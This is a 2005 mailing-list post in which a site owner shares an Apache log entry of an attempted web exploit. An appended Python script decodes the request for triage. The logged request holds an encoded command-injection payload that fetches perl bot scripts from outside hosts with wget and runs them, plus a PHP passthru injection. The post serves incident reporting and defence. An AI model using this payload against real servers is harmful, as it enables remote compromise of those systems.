Security Incidents mailing list archives

Attempted exploit for some web service.
From: Robin <robin () kallisti net nz>
Date: Fri, 28 Jan 2005 00:41:57 +1300

Hi, I just got this in my apache logs:
65.39.227.110 - - [28/Jan/2005:00:23:26 +1300] 
"GET /RobinsStuff/UnsortedLinks&r
ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.te
mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/
.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%6
5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.
%70%61%73%73%74%68%72%75%28%24%48%5
4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 
11746 "-" "LWP::Simple/5.65"

(sorry about the wrapping). Now, I know it didn't hurt the service it hit, as 
it's a Wiki page, and the software ignores any unexpected parameters on the 
URL. I'm wondering where it comes from, however. It's also useful to note 
that that IP address hadn't touched my webserver at all recently, other than 
this. Out of curiosity, I checked, and both the URLs that it tries to wget 
stuff from are 404.

-- 
Robin <robin () kallisti net nz>             JabberID: <eythian () jabber org>

Hostes alienigeni me abduxerunt. Qui annus est?

PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8  7175 14D3 6485 A99C EB6D
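
A triage sketch for the log entry in the post above, added here as an example and not part of Robin's message: it rejoins the wrapped request, splits the parameters on `&` (this request has no `?`), and percent-decodes each value until it stops changing, which shows that `highlight` was encoded twice. The function names and the indicator list are assumptions chosen for illustration.

```python
from urllib.parse import unquote

# Request target from the log entry in the post, rejoined across its wrapped lines.
REQUEST_TARGET = (
    "/RobinsStuff/UnsortedLinks&r"
    "ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.te"
    "mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/"
    ".notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%6"
    "5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527."
    "%70%61%73%73%74%68%72%75%28%24%48%5"
    "4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';"
)

# Illustrative (not exhaustive) tokens worth flagging in a decoded parameter.
INDICATORS = ("wget ", "perl ", "passthru(", "/tmp", "mkdir ")


def decode_fully(value, max_passes=5):
    """Percent-decode until the value stops changing; return (text, passes)."""
    passes = 0
    while passes < max_passes:
        decoded = unquote(value)
        if decoded == value:
            break
        value, passes = decoded, passes + 1
    return value, passes


def triage(target):
    """Split the target on '&' and decode every name=value pair found after the path."""
    path, *pairs = target.split("&")
    report = {}
    for pair in pairs:
        name, _, raw = pair.partition("=")
        text, passes = decode_fully(raw)
        hits = [tok for tok in INDICATORS if tok in text]
        # passes > 1 means the value was encoded more than once.
        report[name] = {"decoded": text, "passes": passes, "hits": hits}
    return path, report


if __name__ == "__main__":
    path, report = triage(REQUEST_TARGET)
    print("path:", path)
    for name, info in report.items():
        print(f"{name}: {info['passes']} decode pass(es), flags={info['hits']}")
        print("   ", info["decoded"])
```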
